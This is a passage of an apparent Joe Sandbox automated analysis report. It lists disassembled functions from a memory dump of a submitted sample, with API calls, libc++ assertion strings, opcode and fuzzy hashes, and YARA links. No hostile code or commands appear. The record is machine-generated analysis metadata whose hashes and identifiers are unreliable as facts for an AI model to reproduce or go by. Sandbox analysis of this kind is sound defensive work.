                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D79B77
                                                  • CatchIt.LIBVCRUNTIME ref: 00D79CD6
                                                  • _UnwindNestedFrames.LIBCMT ref: 00D79DD7
                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D79DF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2332921423-393685449
                                                  • Opcode ID: bf3f4392e9bf7bab86c5de7be3d91891e8cb5966c3eff6ee9b262c1c2a7c0c56
                                                  • Instruction ID: 5e620e1a2d4ca65f0373879b0465bb661cc79ff9314ba0b07726d46b78a1c347
                                                  • Opcode Fuzzy Hash: bf3f4392e9bf7bab86c5de7be3d91891e8cb5966c3eff6ee9b262c1c2a7c0c56
                                                  • Instruction Fuzzy Hash: 4AB17E72800209EFCF25DFA5D8A19AEF7B5FF04310F58815AE8196B216E731DA51CBB1
                                                  Function 00D1F5A0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 256COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DAECF4,00DAECF4,ThreadLocalEventBuffer,?,?,?,?,?,?,?,?,__location != nullptr,null pointer given to construct_at), ref: 00D1F7EE
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00DAFCAE,?,?,?,?,?,?,?,?,?,__location != nullptr,null pointer given to construct_at), ref: 00D1F862
                                                  Strings
                                                  • __location != nullptr, xrefs: 00D1F6C4
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D1F6CB
                                                  • ThreadLocalEventBuffer, xrefs: 00D1F7D7
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D1F6D0
                                                  • null pointer given to construct_at, xrefs: 00D1F6BF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$ThreadLocalEventBuffer$__location != nullptr$null pointer given to construct_at
                                                  • API String ID: 17069307-3489168812
                                                  • Opcode ID: 1c98c9183759bf8bc9556d9ac2f69ad461af9388d85088791a68c559af16250e
                                                  • Instruction ID: a89db422008a4b226dd6947e500332fb316b25222d5b1b0ad0cd310871b3770b
                                                  • Opcode Fuzzy Hash: 1c98c9183759bf8bc9556d9ac2f69ad461af9388d85088791a68c559af16250e
                                                  • Instruction Fuzzy Hash: D781E371A002159FC710DF68D884AAAB7B5EF85324F19863DE40A9B391DB31ED45CBF0
                                                  Function 00D330C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000000,00D33477,?,?,?,?,?,?,?,?,?,00D37D18,?,00DC3ED8), ref: 00D330E8
                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,FFFFFFFF,?), ref: 00D3312D
                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,FFFFFFFF,?), ref: 00D33195
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  Strings
                                                  • __s2 < __s1 || __s2 >= __s1+__n, xrefs: 00D33244
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h, xrefs: 00D3324E
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D33253
                                                  • char_traits::copy overlapped range, xrefs: 00D3323F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$__s2 < __s1 || __s2 >= __s1+__n$char_traits::copy overlapped range
                                                  • API String ID: 17069307-2841209950
                                                  • Opcode ID: a95a72be6c96e83bfe3687d98387fec8b5076b9f4a3d72c477172a84178a1805
                                                  • Instruction ID: 00a76b2a8d7ca338f11c549f7ac7c738c5386ecff89c2550ef0a2c1d164cd684
                                                  • Opcode Fuzzy Hash: a95a72be6c96e83bfe3687d98387fec8b5076b9f4a3d72c477172a84178a1805
                                                  • Instruction Fuzzy Hash: 1741D071A003059FDB20DF64D9C4B6A7BA4EF05714F288159EC599B282E771EE85CBB0
                                                  Function 00D5CAF0 Relevance: 12.4, APIs: 8, Instructions: 353COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __aulldiv.LIBCMT ref: 00D5CB99
                                                  • __aullrem.LIBCMT ref: 00D5CBAE
                                                  • __aulldiv.LIBCMT ref: 00D5CC28
                                                  • __aullrem.LIBCMT ref: 00D5CC36
                                                  • __aulldiv.LIBCMT ref: 00D5CC75
                                                  • __aulldiv.LIBCMT ref: 00D5CC92
                                                  • __aullrem.LIBCMT ref: 00D5CCD3
                                                  • __aullrem.LIBCMT ref: 00D5CD17
                                                    • Part of subcall function 00D5CF27: __aullrem.LIBCMT ref: 00D5CF45
                                                    • Part of subcall function 00D5CF27: __aulldiv.LIBCMT ref: 00D5CF58
                                                    • Part of subcall function 00D5CF27: __aullrem.LIBCMT ref: 00D5CF68
                                                    • Part of subcall function 00D5CF27: __aulldiv.LIBCMT ref: 00D5CF7D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __aulldiv__aullrem
                                                  • String ID:
                                                  • API String ID: 3839614884-0
                                                  • Opcode ID: ac63cf86c4e199837cdce4627aaa840dc29b2a32fe53d6a1b4bd442f9cad5de8
                                                  • Instruction ID: f5f1da0bea8dbdd8d81d713f9940e30f653657c0edfbad4822280e053b25a01e
                                                  • Opcode Fuzzy Hash: ac63cf86c4e199837cdce4627aaa840dc29b2a32fe53d6a1b4bd442f9cad5de8
                                                  • Instruction Fuzzy Hash: A7C19D72B0021A9FDF149E6CC892BAEB7E6EF89311F194129FD55E7381D6349C058BA0
                                                  Function 00D7CEC6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 48171e9cde727e592f8927d24a51722536bbad0b4e8a1beceb33071045b49635
                                                  • Instruction ID: 91c3f2c37246171b831f0a5537a0b36c3844b5ca4c25226a58eb001ffc3a563b
                                                  • Opcode Fuzzy Hash: 48171e9cde727e592f8927d24a51722536bbad0b4e8a1beceb33071045b49635
                                                  • Instruction Fuzzy Hash: 28B14B72A013559FDB15CF28CC81BAEBBB6EF55350F18C159E948AB282F274D941C7B0
                                                  Function 00D4FCB0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • vector::erase(first, last) called with invalid range, xrefs: 00D4FF3C
                                                  • __first <= __last, xrefs: 00D4FF41
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D4FF4B
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D4FF50
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$__first <= __last$vector::erase(first, last) called with invalid range
                                                  • API String ID: 0-3504092323
                                                  • Opcode ID: 69bf3bbaa90f8437d97cbc5b0c8447331a4563cd6697fd81c5d4c21bf9ef4d1b
                                                  • Instruction ID: cc3ce6e4d7920d2e62a713911fbf8dc2d006010e304ee7b9d2a48eaee8f0faeb
                                                  • Opcode Fuzzy Hash: 69bf3bbaa90f8437d97cbc5b0c8447331a4563cd6697fd81c5d4c21bf9ef4d1b
                                                  • Instruction Fuzzy Hash: 4381A1B1E002549FDB10CF64D844BAEBBB5EF09314F184469E849BB262E771AD49CBB1
                                                  Function 00D53060 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D53082
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D53290
                                                  Strings
                                                  • __location != nullptr, xrefs: 00D532B2
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D532B9
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D532BE
                                                  • null pointer given to construct_at, xrefs: 00D532AD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$__location != nullptr$null pointer given to construct_at
                                                  • API String ID: 1678258262-3901857445
                                                  • Opcode ID: 9ee06e78316158d5a2392317b2a632a2dbdb5e38c49db8d374fba16fca444244
                                                  • Instruction ID: 5c3c725ae5a28098f215f1c2974c729c4d7523b932429a939a690b707768838a
                                                  • Opcode Fuzzy Hash: 9ee06e78316158d5a2392317b2a632a2dbdb5e38c49db8d374fba16fca444244
                                                  • Instruction Fuzzy Hash: BE714E71604702AFCB04CF64C89195AB7E1FF88364F148A2DF89997791D730EA49CFA5
                                                  Function 00D59660 Relevance: 10.7, APIs: 7, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsValidSecurityDescriptor.ADVAPI32(00000000), ref: 00D59681
                                                  • GetSecurityDescriptorControl.ADVAPI32(00000000,0000FFFF,FFFFFFFF), ref: 00D596AD
                                                  • GetSecurityDescriptorOwner.ADVAPI32(00000000,FFFFFFFF,FFFFFFFF), ref: 00D596CE
                                                    • Part of subcall function 00D44840: IsValidSid.ADVAPI32(00000000), ref: 00D4477E
                                                    • Part of subcall function 00D44840: GetLengthSid.ADVAPI32(00000000), ref: 00D44789
                                                  • SetLastError.KERNEL32(0000053A), ref: 00D596F3
                                                  • GetSecurityDescriptorGroup.ADVAPI32(00000000,FFFFFFFF,FFFFFFFF), ref: 00D59755
                                                  • GetSecurityDescriptorDacl.ADVAPI32(00000000,FFFFFFFF,FFFFFFFF,FFFFFFFF), ref: 00D597A4
                                                  • GetSecurityDescriptorSacl.ADVAPI32(00000000,FFFFFFFF,FFFFFFFF,FFFFFFFF), ref: 00D59807
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: DescriptorSecurity$Valid$ControlDaclErrorGroupLastLengthOwnerSacl
                                                  • String ID:
                                                  • API String ID: 1486342557-0
                                                  • Opcode ID: 1586b9b6937c9b438d94d34fb4579f1e49ef7e88395c843acd6d030e2e11c9b7
                                                  • Instruction ID: 323f7e0c36fcec5435aedf427bf3bbe204fceb52163f0ea4ccda04122afda370
                                                  • Opcode Fuzzy Hash: 1586b9b6937c9b438d94d34fb4579f1e49ef7e88395c843acd6d030e2e11c9b7
                                                  • Instruction Fuzzy Hash: F7919170C00399DADF21DBA4CC54BEEFB78AF06315F184289E89966281DB745A8DCF31
                                                  Function 00D38500 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32 ref: 00D385AE
                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 00D386A4
                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 00D38764
                                                  • __Init_thread_header.LIBCMT ref: 00D387F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Release$AcquireInit_thread_header
                                                  • String ID: DumpWithoutCrashing
                                                  • API String ID: 3494467697-3234294828
                                                  • Opcode ID: 74df77468cd7ca2e36056cc96590d9d0b83fb87882bf5ba4b51f40feb2e7fe89
                                                  • Instruction ID: 43c7206de8264f6392291da6a5eabca81c1c80fdf8e64486d49cfa118049dbc1
                                                  • Opcode Fuzzy Hash: 74df77468cd7ca2e36056cc96590d9d0b83fb87882bf5ba4b51f40feb2e7fe89
                                                  • Instruction Fuzzy Hash: A59149B4508742DFC714DF28E494A1ABBF1FF85324F544A1DF8969B390CB70A880DBA2
                                                  Function 00D1926B Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D195B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header
                                                  • String ID: Friday$Monday$Sunday$Tuesday$rday
                                                  • API String ID: 3738618077-4029317968
                                                  • Opcode ID: 4dc0c535ee558b26bc03d358034071ced0feaaf3a6965acc22e9606ad3c1137d
                                                  • Instruction ID: 34bf83d6e1e9dcd33a5cdf0437718d6ed020ce16032eba5a36ad2ef2d7a4f839
                                                  • Opcode Fuzzy Hash: 4dc0c535ee558b26bc03d358034071ced0feaaf3a6965acc22e9606ad3c1137d
                                                  • Instruction Fuzzy Hash: B381F4B0808B93ABE7198F54F824B04BBA0E711355F5441ADE8899B3E9CBF438C4C772
                                                  Function 00D3F460 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: , {$} l,
                                                  • API String ID: 4218353326-191534019
                                                  • Opcode ID: ec9043b642ba4340aa90e5ae4216c47a8258d24d8e2313664930ae9bab0761bf
                                                  • Instruction ID: f6301c00747e5223f66175074efcc421d2fd612aeef6d4d4e95af9f984a5518f
                                                  • Opcode Fuzzy Hash: ec9043b642ba4340aa90e5ae4216c47a8258d24d8e2313664930ae9bab0761bf
                                                  • Instruction Fuzzy Hash: 61519FB1D00218BBDF10AFA0DC86BFF7B68AF06314F080064F80877292E6759A1997B1
                                                  Function 00D4FF60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,00D4FBC9,?,00000001), ref: 00D4FFDD
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D50136
                                                  Strings
                                                  • __location != nullptr, xrefs: 00D5014B
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D50152
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D50157
                                                  • null pointer given to construct_at, xrefs: 00D50146
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
